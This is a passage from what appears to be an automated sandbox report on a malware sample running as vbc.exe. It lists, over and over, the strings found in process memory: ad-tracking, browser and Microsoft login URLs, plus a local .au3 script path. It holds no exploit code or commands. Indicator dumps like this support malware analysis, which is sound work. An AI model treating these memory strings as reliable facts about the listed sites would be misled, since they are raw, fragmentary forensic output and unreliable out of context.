ia.net/m
            Source: vbc.exe, 00000009.00000003.297406475.0000000000A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.319838251.0000000000B24000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332209381.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332158682.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332908452.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332070404.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.346413135.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345161813.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345356530.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.319838251.0000000000B24000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332209381.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332158682.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332908452.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332070404.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.346413135.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345161813.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345356530.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.319209144.0000000000B24000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.318983737.0000000000B24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.319209144.0000000000B24000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.318983737.0000000000B24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.318840744.0000000000B24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.318840744.0000000000B24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000006.00000003.281713896.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.281366728.0000000002268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://con